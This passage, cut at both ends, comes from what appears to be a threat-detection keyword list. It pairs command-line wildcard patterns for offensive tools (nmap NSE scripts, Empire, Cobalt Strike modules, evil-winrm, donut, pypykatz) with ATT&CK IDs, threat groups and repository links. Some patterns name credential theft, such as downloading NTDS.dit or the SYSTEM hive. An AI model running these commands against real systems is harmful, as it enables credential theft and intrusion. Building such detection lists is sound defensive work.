T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -* dns-blacklist.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-cache-snoop.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dnscan.py*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -* dns-check-zone.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-client-subnet-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-fuzz.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-ip6-arpa-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dnslog-cn.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* dns-nsec3-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-nsec-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-nsid.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-random-srcport.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-random-txid.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-recursion.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-service-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-srv-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -dns-tcp -nameserver * -dc-ip*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -* dns-update.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-zeustracker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dns-zone-transfer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* docker-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -domain * /dc * /service cifs /ptt*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/ricardojba/noPac,1,0,N/A,N/A,1,34,5,2021-12-19T17:42:12Z,2021-12-13T18:51:31Z -* --domain * --kerberos*,offensive_tool_keyword,gMSADumper,Lists who can read any gMSA password blobs and parses them if the current user has access.,T1552.001 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/micahvandeusen/gMSADumper,1,0,N/A,N/A,2,190,34,2023-08-23T13:32:49Z,2021-04-10T00:15:24Z -* -Domain * -SMB1 *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-SMBExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* domainDumper*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,0,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -* domainhunter *,offensive_tool_keyword,domainhunter,Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ,T1583.002 - T1568.002,TA0011 - TA0009,N/A,N/A,Phishing,https://github.com/threatexpress/domainhunter,1,0,N/A,N/A,10,1380,291,2022-10-26T03:15:13Z,2017-03-01T11:16:26Z -* --domains ./domains.txt run*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,0,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -* domcon-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* domcon-cmd.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dome.py*,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,0,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -* domino-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -DoNotPersistImmediately *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --dont-enumerate-acls *,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,0,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -* --dont-enumerate-acls * -e *,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,0,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -* --donut --rehash n --silent -o /tmp/*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* donut.c *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -* donut.exe *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -* donut.o *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -* --dotnetassembly * --amsi*,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -* --dotnetassembly * --appdomain *,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -* --dotnetassembly * --assemblyargs *,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -* --dotnetassembly * --mailslot*,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -* --dotnetassembly * --pipe *,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -* -Downgrade False -Restore False -Impersonate True * -challange *,offensive_tool_keyword,Internal-Monologue,Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS,T1003 - T1051 - T1574 - T1110 - T1547,TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/eladshamir/Internal-Monologue,1,0,N/A,N/A,10,1283,243,2018-10-11T12:13:08Z,2017-12-09T05:59:01Z -* download *\NTDS\NTDS.dit*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021 - T1028 - T1046 - T1078 - T1091 - T1219,TA0003 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -* download *\Windows\System32\config\SYSTEM*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021 - T1028 - T1046 - T1078 - T1091 - T1219,TA0003 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,N/A,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -* dpap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dpapi blob *.json *.dat*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential 